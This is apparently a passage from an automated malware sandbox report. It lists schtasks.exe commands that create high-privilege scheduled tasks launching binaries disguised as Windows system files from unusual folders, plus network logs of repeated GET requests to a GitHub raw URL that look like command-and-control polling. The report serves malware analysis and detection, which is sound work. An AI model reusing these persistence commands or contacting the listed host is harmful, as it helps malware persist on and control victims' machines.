                                                schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\sihost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3508
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:860
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4396
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\de-DE\SppExtComObj.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4828
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\providercommon\SearchApp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2980
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4888
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\providercommon\SearchApp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1360
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2564
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4928
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1300
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2796
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2396
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Users\Public\AccountPictures\unsecapp.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1468
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Registry.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1832
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3180
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3416
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\debug\dllhost.exe'" /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2476
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\debug\dllhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4476
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\debug\dllhost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2556

                                              Network

                                              • flag-us
                                                DNS
                                                133.211.185.52.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                133.211.185.52.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                85.49.80.91.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                85.49.80.91.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                73.159.190.20.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                73.159.190.20.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                95.221.229.192.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                95.221.229.192.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                raw.githubusercontent.com
                                                conhost.exe
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                raw.githubusercontent.com
                                                IN A
                                                Response
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.109.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.111.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.110.133
                                                raw.githubusercontent.com
                                                IN A
                                                185.199.108.133
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:17:00 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600070-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 2
                                                X-Timer: S1734815821.963868,VS0,VE0
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 91c799b9d11f94390a39bccc2013ea0024b707f3
                                                Expires: Sat, 21 Dec 2024 21:22:00 GMT
                                                Source-Age: 276
                                              • flag-us
                                                DNS
                                                133.109.199.185.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                133.109.199.185.in-addr.arpa
                                                IN PTR
                                                Response
                                                133.109.199.185.in-addr.arpa
                                                IN PTR
                                                cdn-185-199-109-133githubcom
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:17:15 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lon4259-LON
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815835.374251,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: dc313ab60f343ad6dcfc00b73093752565b9e0bf
                                                Expires: Sat, 21 Dec 2024 21:22:15 GMT
                                                Source-Age: 297
                                              • flag-us
                                                DNS
                                                50.23.12.20.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                50.23.12.20.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                13.86.106.20.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                13.86.106.20.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                15.164.165.52.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                15.164.165.52.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                DNS
                                                92.12.20.2.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                92.12.20.2.in-addr.arpa
                                                IN PTR
                                                Response
                                                92.12.20.2.in-addr.arpa
                                                IN PTR
                                                a2-20-12-92deploystaticakamaitechnologiescom
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:17:31 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lon4254-LON
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815851.918969,VS0,VE122
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 6959e4972632308322ff4e4449dd0c12d9885f92
                                                Expires: Sat, 21 Dec 2024 21:22:31 GMT
                                                Source-Age: 0
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:17:46 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lon420111-LON
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815867.621122,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: a6ffde2d43767baaa49d9090804b16ee68aba752
                                                Expires: Sat, 21 Dec 2024 21:22:46 GMT
                                                Source-Age: 16
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:17:58 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600084-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815878.427685,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: eeec38c1f9bfc638035b5ece53845bee36448fbd
                                                Expires: Sat, 21 Dec 2024 21:22:58 GMT
                                                Source-Age: 2
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:18:12 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600082-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815893.809547,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 1fbbce0ad053d792e9f33acb0fdc59e41a79e765
                                                Expires: Sat, 21 Dec 2024 21:23:12 GMT
                                                Source-Age: 16
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:18:20 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lon420105-LON
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815900.336205,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 57602a465e8e9c615375b9b7d4289fa8dab4f08a
                                                Expires: Sat, 21 Dec 2024 21:23:20 GMT
                                                Source-Age: 49
                                              • flag-us
                                                DNS
                                                23.236.111.52.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                23.236.111.52.in-addr.arpa
                                                IN PTR
                                                Response
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:18:27 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600020-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815908.606938,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: ecf62415131290bf7029bce95c9a5442a9b3caa0
                                                Expires: Sat, 21 Dec 2024 21:23:27 GMT
                                                Source-Age: 31
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:18:38 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600099-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815919.891393,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 3c062b343997e5d20a556d8edc4b7f2c9a2df2c6
                                                Expires: Sat, 21 Dec 2024 21:23:38 GMT
                                                Source-Age: 42
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:18:53 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600093-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815933.361147,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 5cb80583d773a9accf344696b0cb3099df6cfdc4
                                                Expires: Sat, 21 Dec 2024 21:23:53 GMT
                                                Source-Age: 57
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:19:04 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600081-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 2
                                                X-Timer: S1734815944.200748,VS0,VE0
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 3d828d91f7635c37165749bcf2b127d334f21fa4
                                                Expires: Sat, 21 Dec 2024 21:24:04 GMT
                                                Source-Age: 67
                                              • flag-us
                                                GET
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                conhost.exe
                                                Remote address:
                                                185.199.109.133:443
                                                Request
                                                GET /justbio123/raven/main/api.txt HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                Response
                                                HTTP/1.1 200 OK
                                                Connection: keep-alive
                                                Content-Length: 4
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                Accept-Ranges: bytes
                                                Date: Sat, 21 Dec 2024 21:19:12 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-lcy-eglc8600086-LCY
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1734815953.513512,VS0,VE6
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 5855cb549166e7e0f828ced81f9f25293ef1cd34
                                                Expires: Sat, 21 Dec 2024 21:24:12 GMT
                                                Source-Age: 76
                                              • flag-us
                                                DNS
                                                225.162.46.104.in-addr.arpa
                                                Remote address:
                                                8.8.8.8:53
                                                Request
                                                225.162.46.104.in-addr.arpa
                                                IN PTR
                                                Response
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                914 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                897 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
                                              • 185.199.109.133:443
                                                https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                tls, http
                                                conhost.exe
                                                861 B
                                                5.1kB
                                                8
                                                9

                                                HTTP Request

                                                GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                HTTP Response

                                                200
